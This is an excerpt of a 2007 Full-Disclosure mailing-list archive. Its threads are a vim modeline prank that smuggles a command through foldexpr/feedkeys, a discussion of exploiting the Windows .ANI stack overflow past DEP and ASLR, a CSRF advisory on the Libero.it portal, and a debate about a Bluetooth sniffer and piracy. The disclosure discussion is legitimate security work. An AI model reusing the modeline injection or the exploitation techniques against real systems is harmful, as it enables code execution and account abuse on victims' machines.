-0500 Subject: [Full-disclosure] April 1 joke In-Reply-To: <969102.78862.qm@web63807.mail.re1.yahoo.com> References: <969102.78862.qm@web63807.mail.re1.yahoo.com> Message-ID: <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> too bad i don't get it. On 4/1/07, V Comics wrote: > vim: > foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x > 3a%s/./\:)/g\\\\\\x3aq!\\"): > > a > > > > ________________________________ > Ask a question on any topic and get answers from real people. Go to Yahoo! > Answers. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From waldoalvarez00 at gmail.com Sun Apr 1 17:13:53 2007 From: waldoalvarez00 at gmail.com (wac) Date: Sun, 1 Apr 2007 12:13:53 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> Message-ID: On 4/1/07, Larry Seltzer wrote: > > >>The issue is that this only works with DEP turned off! > > Interesting point. I haven't seen this mentioned anywhere, including the > Microsoft advisory > (http://www.microsoft.com/technet/security/advisory/935423.mspx). > > Has anyone actually tested this with DEP on/off to be sure? Yes, winhex uses the function when you open the .ani and I don't have it running with DEP turned on and the same goes for firefox that also leaves the file openend when I openen web link dev sent me (already tested winhex with the address of exitprocess that btw seems to float around from system to system since the version dev sent me does not works for me and it works like a charm when I built it). I was talking with dev code about DEP bypassing btw, we think that is possible to exploit even with >> DEP ON <<. Just ideas for now. Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry_seltzer/ > Contributing Editor, PC Magazine > larryseltzer at ziffdavis.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/7bc06b24/attachment.html From kf_lists at digitalmunition.com Sun Apr 1 17:25:32 2007 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Sun, 1 Apr 2007 12:25:32 -0400 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> Giorgio if anything he is blowing the whistle on the vendors that charge a metric shit ton for a piece of hardware that is not necessary. -KF On Apr 1, 2007, at 11:17 AM, Giorgio Fedon wrote: > | Hi, > | > | You missed the point completely. He's not promoting software > piracy but > | showing that the high-dollar bluetooth sniifers are not required > and that > | you're average dongle can do everything that a proprietary > product can. > > The "thinly veiled advert" was to mention that either: > > 1. He is using a pireted version of the bluetooth sniffer; > 2. He has downloaded a pirated version of the bluetooth sniffer and > printed a pdf of the readme inside; > 3. He is the author of the pirated version of the bluetooth sniffer. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From cslyon at gmail.com Sun Apr 1 17:24:51 2007 From: cslyon at gmail.com (Chris Lyon) Date: Sun, 1 Apr 2007 09:24:51 -0700 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> Message-ID: On 4/1/07, wac wrote: > > > > On 4/1/07, Larry Seltzer wrote: > > > > >>The issue is that this only works with DEP turned off! > > > > Interesting point. I haven't seen this mentioned anywhere, including the > > Microsoft advisory > > ( http://www.microsoft.com/technet/security/advisory/935423.mspx). > > > > Has anyone actually tested this with DEP on/off to be sure? > > Did you guys see this from the CISRT. http://www.cisrt.org/enblog/read.php?68 Yes, winhex uses the function when you open the .ani and I don't have it > running with DEP turned on and the same goes for firefox that also leaves > the file openend when I openen web link dev sent me (already tested winhex > with the address of exitprocess that btw seems to float around from system > to system since the version dev sent me does not works for me and it works > like a charm when I built it). I was talking with dev code about DEP > bypassing btw, we think that is possible to exploit even with >> DEP ON <<. > Just ideas for now. > > Larry Seltzer > > eWEEK.com Security Center Editor > > http://security.eweek.com/ > > http://blog.eweek.com/blogs/larry_seltzer/ > > Contributing Editor, PC Magazine > > larryseltzer at ziffdavis.com > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/6e914036/attachment.html From edcarp at gmail.com Sun Apr 1 17:08:48 2007 From: edcarp at gmail.com (Ed Carp) Date: Sun, 1 Apr 2007 09:08:48 -0700 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: <1b0d006c0704010908r12fc0d82l74679879d4985fff@mail.gmail.com> On 4/1/07, Giorgio Fedon wrote: > 3. He is the author of the pirated version of the bluetooth sniffer. Isn't that a logical impossibility? If he's the author, it can't be pirated, now can it? From giorgio.fedon at gmail.com Sun Apr 1 17:37:48 2007 From: giorgio.fedon at gmail.com (Giorgio Fedon) Date: Sun, 1 Apr 2007 18:37:48 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> Message-ID: Hi Kevin, I could understand that vendors are charging simple CSR dongles (19 dollars??) up to thousands of dollars. But the way to publish a paper making a direct reference (if someone is aware about the underlying piece of software he is talking about) to a particular vendor it's not so cute. Maybe they have written their firmware. Worse is to sustain the fact that the world need a better bluetooth sniffer, using the information that can be found inside the warezed version of the tool. The opensource community I think that is able to do it's own research without software piracy. 2007/4/1, Kevin Finisterre (lists) : > > Giorgio if anything he is blowing the whistle on the vendors that > charge a metric shit ton for a piece of hardware that is not necessary. > -KF > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/9d09756d/attachment.html From Thierry at Zoller.lu Sun Apr 1 18:07:06 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Sun, 1 Apr 2007 19:07:06 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: <1762752538.20070401190706@Zoller.lu> An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/723e507c/attachment.html From hdw at kallisti.se Sun Apr 1 18:13:56 2007 From: hdw at kallisti.se (Anders B Jansson) Date: Sun, 01 Apr 2007 19:13:56 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> Message-ID: <460FE854.7080502@kallisti.se> Giorgio Fedon wrote: > Worse is to sustain the fact that the world need a better bluetooth > sniffer, using the information that can be found inside the warezed > version of the tool. The opensource community I think that is able to do > it's own research without software piracy. If the information is within the 'warezed' version, then it's also within 'the non-warezed' one. Using available distributed information to write software isn't piracy. Taking someones written software and distributing it as your own and under your own terms most certainly is. But building on someones idea and distributed information to write a different tool (smaller, bigger, better, worse, cheaper, what ever) isn't. -- // hdw From hdw at kallisti.se Sun Apr 1 18:01:34 2007 From: hdw at kallisti.se (Anders B Jansson) Date: Sun, 01 Apr 2007 19:01:34 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: Message-ID: <460FE56E.8010603@kallisti.se> Giorgio Fedon wrote: > The "thinly veiled advert" was to mention that either: > > 1. He is using a pireted version of the bluetooth sniffer; > 2. He has downloaded a pirated version of the bluetooth sniffer and > printed a pdf of the readme inside; > 3. He is the author of the pirated version of the bluetooth sniffer. Erh? Are we talking of pirate as in "stealing our holy IP", where 'IP' as in using j.random BT as a BT sniffer or 'IP' as in the words "bluetooth sniffer"? As far as I can understand the statement it was frikken obvious. You _can_ use j.random BT dongle _if_ you have the required software. Well 'doh!', of course you can. But you need a piece of software that can do that. The use of the phrase "the bluetooth sniffer" got me wondering. Do you really think that there's only one single software that can do this? It's like stating that there's one software to capture audio from a microphone and that all other audiorecorders are 'pirated software'. Or a network device? A firewire device? A USB device? Sniffers are essential tools, if available they'll be used. If not available, they'll be created, if available but bad, broken or too expensive they'll be recreated. -- // hdw From giorgio.fedon at gmail.com Sun Apr 1 19:15:05 2007 From: giorgio.fedon at gmail.com (Giorgio Fedon) Date: Sun, 1 Apr 2007 20:15:05 +0200 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: <460FE854.7080502@kallisti.se> References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> <460FE854.7080502@kallisti.se> Message-ID: ----------------- To Thierry: > Oh, dear, here is my "thinly veiled advert" for you : > - You can potentially be sued for this (I would sue you, > see you are slandering a consultant here that gets jobs based > on his reputation) First of all I haven't said anything that could not be rebated. So I am not slandering anyone. I just said what I'm thinking at the moment; maybe Max Moser can make me change my mind. > you refer to ? I have read the paper and found none, where did you ? The software is described into detail inside the paper. Dongle activation, .ini files and .dcu files. This seems to run on Windows. I know only one software like this one (Maybe you are using it as well). > Where is he promoting Software Piracy ? I have read the paper and found none, where did you ? Those software are based upon a dongle (USB Bluetooth in this case). If you can clone the dongle, you could be able to easily clone the software. > First, I knew nothing about such a "release" until YOU posted information about the name > of a (what apparently is) a Warez group I'm sorry this was my mistake, but there wasn't any direct link to the release. Anyway I found this stuff after I have read the .pdf document. At first I have found the vendor then I have searched in google "Vendor + CSR dongle" and I found that. > Second, you apparently assume the Warez group is the same person that wrote the paper, which is > a very ignorant assumption to make, not to mention a dangerous one. I never told this. > The opensource community I think that is able to do it's own research without software piracy. Read it as not forcing (or partially forcing) the protection of commercial software. ----------------- To Anders: I agree with you -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/5c7d7586/attachment.html From nytrokiss at gmail.com Sun Apr 1 19:40:11 2007 From: nytrokiss at gmail.com (James Matthews) Date: Sun, 1 Apr 2007 11:40:11 -0700 Subject: [Full-disclosure] April 1 joke In-Reply-To: <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> Message-ID: <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com> punch it in vi On 4/1/07, Jason Miller wrote: > > too bad i don't get it. > > On 4/1/07, V Comics wrote: > > vim: > > > foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x > > 3a%s/./\:)/g\\\\\\x3aq!\\"): > > > > a > > > > > > > > ________________________________ > > Ask a question on any topic and get answers from real people. Go to > Yahoo! > > Answers. > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/52cf1a30/attachment.html From kf_lists at digitalmunition.com Sun Apr 1 19:43:27 2007 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Sun, 1 Apr 2007 14:43:27 -0400 Subject: [Full-disclosure] Busting The Bluetooth Myth In-Reply-To: References: <199F4FE0-B9F8-49A7-9388-F0223B142C70@digitalmunition.com> <460FE854.7080502@kallisti.se> Message-ID: Anyone wanna buy a used BPA100? =] -KF On Apr 1, 2007, at 2:15 PM, Giorgio Fedon wrote: > ----------------- To Thierry: > > > Oh, dear, here is my "thinly veiled advert" for you : > > > - You can potentially be sued for this (I would sue you, > > see you are slandering a consultant here that gets jobs based > > on his reputation) > > First of all I haven't said anything that could not be rebated. > So I am not slandering anyone. I just said what I'm thinking at the > moment; > maybe Max Moser can make me change my mind. > > > you refer to ? I have read the paper and found none, where did you ? > > The software is described into detail inside the paper. > Dongle activation, .ini files and .dcu files. This seems to run on > Windows. I know only one software like this one (Maybe you are > using it as well). > > > Where is he promoting Software Piracy ? I have read the paper > and found none, where did you ? > > Those software are based upon a dongle (USB Bluetooth in this case). > If you can clone the dongle, you could be able to easily clone the > software. > > > First, I knew nothing about such a "release" until YOU posted > information about the name > > of a (what apparently is) a Warez group > > I'm sorry this was my mistake, but there wasn't any direct link to > the release. > Anyway I found this stuff after I have read the .pdf document. At > first I have found the vendor > then I have searched in google "Vendor + CSR dongle" and I found that. > > > Second, you apparently assume the Warez group is the same person > that wrote the paper, which is > > a very ignorant assumption to make, not to mention a dangerous one. > > I never told this. > > > The opensource community I think that is able to do it's own > research without software piracy. > > Read it as not forcing (or partially forcing) the protection of > commercial software. > > > ----------------- To Anders: > > I agree with you > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From callax at goodfellas.shellcode.com.ar Sun Apr 1 17:37:18 2007 From: callax at goodfellas.shellcode.com.ar (Goodfellas Research Security Team - Callax) Date: Sun, 1 Apr 2007 18:37:18 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> Message-ID: <20070401163438.5D9F5E80DD@mail.shellcode.com.ar> Hi, I tested it in Windows xp sp2 and it doesn't work. Greetings Callax Shellcode Security Research Team. Argentine -----Message d'origine----- De?: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] De la part de Larry Seltzer Envoy??: Domingo, 01 de Abril de 2007 01:50 p.m. ??: full-disclosure at lists.grok.org.uk Objet?: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow >>The issue is that this only works with DEP turned off! Interesting point. I haven't seen this mentioned anywhere, including the Microsoft advisory (http://www.microsoft.com/technet/security/advisory/935423.mspx). Has anyone actually tested this with DEP on/off to be sure? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry_seltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From Larry at larryseltzer.com Sun Apr 1 20:10:28 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sun, 1 Apr 2007 15:10:28 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <20070401163438.5D9F5E80DD@mail.shellcode.com.ar> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <20070401163438.5D9F5E80DD@mail.shellcode.com.ar> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD30F@becca.LarrySeltzer.local> >>I tested it in Windows xp sp2 and it doesn't work. >>Callax Did you try turning DEP off and re-testing? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From Larry at larryseltzer.com Sun Apr 1 20:23:22 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sun, 1 Apr 2007 15:23:22 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> >>It is completely possible to execute shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..) In Vista this should have problems because of ASLR, right? I'm beginning to think that web-based attacks with this in Vista aren't really so scary. Even if you can get them to execute what can you really do in IE protected mode? You need to get the user to run the ANI outside of IE. Can anyone say what actually happens if you read an e-mail in the Vista Mail program with an attack ANI embedded? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From mdranta at gmail.com Sun Apr 1 21:32:04 2007 From: mdranta at gmail.com (Matti Ranta) Date: Sun, 1 Apr 2007 15:32:04 -0500 Subject: [Full-disclosure] April 1 joke In-Reply-To: <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com> References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com> Message-ID: <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com> I don't know how to use vi what do i do On 4/1/07, James Matthews wrote: > punch it in vi > > > On 4/1/07, Jason Miller wrote: > > too bad i don't get it. > > > > On 4/1/07, V Comics wrote: > > > vim: > > > > foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x > > > 3a%s/./\:)/g\\\\\\x3aq!\\"): > > > > > > a > > > > > > > > > > > > ________________________________ > > > Ask a question on any topic and get answers from real people. Go to > Yahoo! > > > Answers. > > > > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: > > > http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > http://www.goldwatches.com/watches.asp?Brand=39 > http://www.wazoozle.com > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Matti Ranta This e-mail and any attachments may contain confidential and privileged information. If you are not the intended recipient, please notify the sender immediately by return e-mail, delete this e-mail and destroy any copies. Any dissemination or use of this information by a person other than the intended recipient is unauthorized and may be illegal. From devcode29 at hotmail.com Sun Apr 1 22:21:43 2007 From: devcode29 at hotmail.com (dev code) Date: Sun, 01 Apr 2007 21:21:43 +0000 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: Message-ID: Just wanted to post that using a ret2libc attack works as shown in the video here: http://www.zippyvideos.com/5991194746836606/ani-xp-sp2/ >From: "Chris Lyon" >To: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow >Date: Sun, 1 Apr 2007 09:24:51 -0700 > >On 4/1/07, wac wrote: >> >> >> >>On 4/1/07, Larry Seltzer wrote: >> > >> > >>The issue is that this only works with DEP turned off! >> > >> > Interesting point. I haven't seen this mentioned anywhere, including >>the >> > Microsoft advisory >> > ( http://www.microsoft.com/technet/security/advisory/935423.mspx). >> > >> > Has anyone actually tested this with DEP on/off to be sure? >> >> >Did you guys see this from the CISRT. > >http://www.cisrt.org/enblog/read.php?68 > > >Yes, winhex uses the function when you open the .ani and I don't have it >>running with DEP turned on and the same goes for firefox that also leaves >>the file openend when I openen web link dev sent me (already tested >>winhex >>with the address of exitprocess that btw seems to float around from system >>to system since the version dev sent me does not works for me and it works >>like a charm when I built it). I was talking with dev code about DEP >>bypassing btw, we think that is possible to exploit even with >> DEP ON >><<. >>Just ideas for now. >> >>Larry Seltzer >> > eWEEK.com Security Center Editor >> > http://security.eweek.com/ >> > http://blog.eweek.com/blogs/larry_seltzer/ >> > Contributing Editor, PC Magazine >> > larryseltzer at ziffdavis.com >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>Hosted and sponsored by Secunia - http://secunia.com/ >> >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _________________________________________________________________ The average US Credit Score is 675. The cost to see yours: $0 by Experian. http://www.freecreditreport.com/pm/default.aspx?sc=660600&bcd=EMAILFOOTERAVERAGE From Larry at larryseltzer.com Sun Apr 1 22:45:04 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sun, 1 Apr 2007 17:45:04 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <46100B19.2040904@immunityinc.com> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> I'm not familiar with Solar Eclipe's claims. I thought the low-entropy argument was impeached a while ago. See http://blogs.msdn.com/michael_howard/archive/2006/10/04/Alleged-Bugs-in- Windows-Vista_1920_s-ASLR-Implementation.aspx The author of the original paper arguing low entropy replies to the blog conceding the point. There are two stages of randomization. Perhaps your exploit proves this wrong, but it's the last I heard on the subject. And even if there are only 256 slots how do you try more than one? Isn't the first wrong one going to crash the browser? As for the exploits in protected mode I'm sure there are things you can do, but it's a huge step down from what you can do in XP and it's gone as soon as you exit IE7 Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com -----Original Message----- From: Dave Aitel [mailto:dave at immunityinc.com] Sent: Sunday, April 01, 2007 3:42 PM To: Larry Seltzer Cc: dev code; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ASRL has limited entropy and the attacker can continue to try exploits an infinite number of times (as Solar Eclipse points out). This means you can write a reliable Vista exploit, theoretically. I'll probably finish one up on Monday. IE in protected mode would still allow you access to the local network and, more importantly, anything IE does. You could, for example, inject code into all viewed webpages that steals passwords and whatnot. Just at the very minimum. - -dave Larry Seltzer wrote: >>> It is completely possible to execute shellcode if we can do some DEP > bypass (ie. ret2libc attack, etc..) > > In Vista this should have problems because of ASLR, right? > > I'm beginning to think that web-based attacks with this in Vista > aren't really so scary. Even if you can get them to execute what can > you really do in IE protected mode? You need to get the user to run > the ANI outside of IE. Can anyone say what actually happens if you > read an e-mail in the Vista Mail program with an attack ANI embedded? > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry%5Fseltzer/ > Contributing Editor, PC Magazine > larryseltzer at ziffdavis.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGEAsYtehAhL0gheoRAutoAJ0QhPsOvcdCTU2dZZgkZYINC3+K3QCdFMQH UH02qnLi2Gbp07rLWpKv/5w= =4oC5 -----END PGP SIGNATURE----- From ad at heapoverflow.com Sun Apr 1 23:16:26 2007 From: ad at heapoverflow.com (ad at heapoverflow.com) Date: Mon, 02 Apr 2007 00:16:26 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> Message-ID: <46102F3A.8000908@heapoverflow.com> From the published poc yes vista is vulnerable , the poc doesn't exploit it but shows enough.. The whole windows browser crashes when you try to open the folder of the malicious .ani file, can't even attach it to an email because thunderbird crashes when I'm browsing to attach the .ani, EIP is overwritten by some wrong datas near the shellcode, . To resume you don't have to open the file on vista, displaying it is enough, there is less user interaction required to exploit that bug on vista than older windows os, surprising... ...or not =) Larry Seltzer wrote: >>> It is completely possible to execute shellcode if we can do some DEP >>> > bypass (ie. ret2libc attack, etc..) > > In Vista this should have problems because of ASLR, right? > > I'm beginning to think that web-based attacks with this in Vista aren't > really so scary. Even if you can get them to execute what can you really > do in IE protected mode? You need to get the user to run the ANI outside > of IE. Can anyone say what actually happens if you read an e-mail in the > Vista Mail program with an attack ANI embedded? > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry%5Fseltzer/ > Contributing Editor, PC Magazine > larryseltzer at ziffdavis.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > . > > From ad at heapoverflow.com Sun Apr 1 23:39:46 2007 From: ad at heapoverflow.com (ad at heapoverflow.com) Date: Mon, 02 Apr 2007 00:39:46 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <46102F3A.8000908@heapoverflow.com> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46102F3A.8000908@heapoverflow.com> Message-ID: <461034B2.6050502@heapoverflow.com> http://www.milw0rm.com/exploits/3634 str0ke told me to test this one and no miracle, it works under vista and the default DEP settings doesnt catch it. ad at heapoverflow.com wrote: > From the published poc yes vista is vulnerable , the poc doesn't > exploit it but shows enough.. > The whole windows browser crashes when you try to open the folder of the > malicious .ani file, > can't even attach it to an email because thunderbird crashes when I'm > browsing to attach the .ani, > EIP is overwritten by some wrong datas near the shellcode, . To resume > you don't have to open the file > on vista, displaying it is enough, there is less user interaction > required to exploit that bug on vista than older windows os, > > surprising... ...or not =) > > Larry Seltzer wrote: > >>>> It is completely possible to execute shellcode if we can do some DEP >>>> >>>> >> bypass (ie. ret2libc attack, etc..) >> >> In Vista this should have problems because of ASLR, right? >> >> I'm beginning to think that web-based attacks with this in Vista aren't >> really so scary. Even if you can get them to execute what can you really >> do in IE protected mode? You need to get the user to run the ANI outside >> of IE. Can anyone say what actually happens if you read an e-mail in the >> Vista Mail program with an attack ANI embedded? >> >> Larry Seltzer >> eWEEK.com Security Center Editor >> http://security.eweek.com/ >> http://blog.eweek.com/blogs/larry%5Fseltzer/ >> Contributing Editor, PC Magazine >> larryseltzer at ziffdavis.com >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> . >> >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > . > > From rosario.valotta at gmail.com Mon Apr 2 01:31:45 2007 From: rosario.valotta at gmail.com (Rosario Valotta) Date: Mon, 2 Apr 2007 02:31:45 +0200 Subject: [Full-disclosure] Severe CSRF vulnerabilities allow mail/msg spoofing in Libero.it portal Message-ID: <--start--> Other severe vulnerabilities are present on Libero.it (italian ISP) portal, always in the Community section. The portal allows users to create personal web pages with unchecked contents. These pages will be hosted under digilander.libero.it domain, so that is possible for an attacker to read and manipulate visitors cookie (with obvious risks for privacy & phishing opportunities...). This is a conceptual mistake... But this is just the beginning: an attacker can use his Libero personal site to conduct CSRF attacks against Community users; merely opening the malicious pages can result in: 1-attaccker can send msgs to other community users from victim's account Ciao!
2- attacker can send e-mails to other community users using victim's account Ciao!
In both cases neither Referrer nor unique tokens are used to prevent CSRF. POC (until not deleted) can be found at : http://digilander.libero.it/testxss/demo/img.htm http://digilander.libero.it/testxss/demo/img2.htm both require you're logged in libero Community. Greetings, Rosario Valotta rosario.valotta at gmail dot com <---end--> From george_ou at lanarchitect.net Mon Apr 2 01:38:29 2007 From: george_ou at lanarchitect.net (George Ou) Date: Sun, 1 Apr 2007 17:38:29 -0700 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow Message-ID: <000301c774bf$3cf4a4f0$b6ddeed0$@net> "ad at heapoverflow.com said: http://www.milw0rm.com/exploits/3634 str0ke told me to test this one and no miracle, it works under vista and the default DEP settings doesn't catch it." Default DEP settings in Windows XP or Vista are worthless since it's off for all applications including IE7. I tested with DEP always-on and it crashed IE7 and the exploit failed. Note that when you manually launch an HTML from your hard drive, Protected Mode is turned off because your HDD is considered a trusted source where as the public Internet is not. If I had try to browse a webpage with this exploit, protected mode would have been turned on. I also had to manually bypass the Active X warning to get the exploit to run and even then it crashed with my fully-on DEP settings with hardware-enforcement. I don't really feel like turning off my DEP settings on my Vista machine though I have a feeling that UAC would prevent it from rooting my system though it could probably damage my files if it were coded to do that. But I had to go out of my way to get this exploit to run by manually downloading the zip and manually enabling the ActiveX control just to get it to crash my browser. So I think it's fair to say that hardware-enforced fully-enabled DEP will defeat the ANI exploit (in the current generic state) all by itself. Protected Mode would have also 